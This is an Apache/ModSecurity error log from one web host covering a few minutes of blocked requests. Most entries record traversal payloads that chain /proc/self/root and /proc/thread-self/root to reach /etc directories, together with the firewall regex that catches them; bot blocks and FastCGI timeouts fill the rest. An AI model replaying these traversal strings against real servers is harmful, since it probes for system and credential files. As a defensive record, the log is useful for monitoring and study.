[Tue Mar 17 14:49:58.371039 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.241.31:59480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmURtY0UrI5A3LftIwACgAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:59.782317 2026] [:error] [pid 17965:tid 140411548894976] [client 74.7.241.31:59492] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUR6t8Nd0UC_OcbVHO0gAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:50:01.307333 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.241.31:59508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUSa4xEDsg_V3ESNZQRgAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:50:04.338724 2026] [:error] [pid 9299:tid 140411582465792] [client 74.7.241.31:59510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUS7-sgTmmJoPuMdy6FAAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:50:05.122250 2026] [proxy_fcgi:error] [pid 7437:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33084] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:50:06.908228 2026] [:error] [pid 9299:tid 140411716749056] [client 74.7.241.31:59510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUTb-sgTmmJoPuMdy6GAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:50:10.904007 2026] [:error] [pid 29151:tid 140411574073088] [client 74.7.241.31:44344] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUUvPqhzTj3BvfDX-LxQAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:50:27.123280 2026] [proxy_fcgi:error] [pid 18380:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33626] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:50:29.160318 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.241.31:44358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUZRj0p0SRWAqcjGF9fgAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:50:33.942924 2026] [mime_magic:error] [pid 6296:tid 140411658000128] (70014)End of file found: [client 74.7.243.128:35144] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/lib
[Tue Mar 17 14:50:49.133788 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34124] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:51:11.141793 2026] [proxy_fcgi:error] [pid 18380:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34548] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:51:33.142216 2026] [proxy_fcgi:error] [pid 6296:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34990] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:51:39.819347 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:40616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUq9Y0UrI5A3LftIwAYAAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:51:47.321313 2026] [:error] [pid 18380:tid 140411691570944] [client 74.7.243.128:45570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUs64xEDsg_V3ESNZQdQAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:51:50.287489 2026] [:error] [pid 7004:tid 140411599251200] [client 74.7.243.128:49374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUtsU6Sx0TG1YjmQiy3gAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:51:55.157796 2026] [proxy_fcgi:error] [pid 29151:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35526] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:51:58.797198 2026] [:error] [pid 29151:tid 140411557287680] [client 74.7.241.31:58756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUvvPqhzTj3BvfDX-L_QAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:51:59.315715 2026] [:error] [pid 7004:tid 140411624429312] [client 74.7.243.128:49374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUv8U6Sx0TG1YjmQiy5QAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:52:17.133789 2026] [proxy_fcgi:error] [pid 6296:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36106] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:52:39.120922 2026] [proxy_fcgi:error] [pid 7437:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:36690] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:53:01.141842 2026] [proxy_fcgi:error] [pid 2598:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37374] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:53:22.992824 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.244.43:58098] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmVEQeiSKl8TjouI-YdjgAAA9M"]
[Tue Mar 17 14:53:23.145816 2026] [proxy_fcgi:error] [pid 7437:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:53:26.266715 2026] [:error] [pid 17965:tid 140411582465792] [client 74.7.228.61:35072] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmVFat8Nd0UC_OcbVHPGQAAAJM"]
[Tue Mar 17 14:53:44.065861 2026] [proxy_fcgi:error] [pid 29151:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38810] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:54:06.128267 2026] [proxy_fcgi:error] [pid 6296:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:39342] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:54:28.425782 2026] [proxy_fcgi:error] [pid 7437:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:39836] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:54:50.121924 2026] [proxy_fcgi:error] [pid 2473:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40316] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:55:04.647444 2026] [:error] [pid 6296:tid 140411582465792] [client 74.7.241.31:36832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmVeHIk7brgkOH-rIWP9AAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:55:09.155763 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.241.31:60066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmVfcU6Sx0TG1YjmQizawAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:55:10.950939 2026] [:error] [pid 9299:tid 140411699963648] [client 74.7.241.31:49488] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmVfr-sgTmmJoPuMdy6nAAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:55:12.085945 2026] [proxy_fcgi:error] [pid 2473:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40824] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:55:15.343767 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.241.31:49492] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmVgweiSKl8TjouI-Yd5gAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:55:34.151954 2026] [proxy_fcgi:error] [pid 6296:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41306] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:55:56.113834 2026] [proxy_fcgi:error] [pid 9299:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41798] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:56:06.111736 2026] [:error] [pid 6296:tid 140411666392832] [client 216.73.216.191:51685] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmVtnIk7brgkOH-rIWQLAAAAUk"]
[Tue Mar 17 14:56:18.185966 2026] [proxy_fcgi:error] [pid 7004:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42276] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:56:19.916935 2026] [:error] [pid 7004:tid 140411616036608] [client 216.73.216.191:29460] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmVw8U6Sx0TG1YjmQizjQAAAo8"]
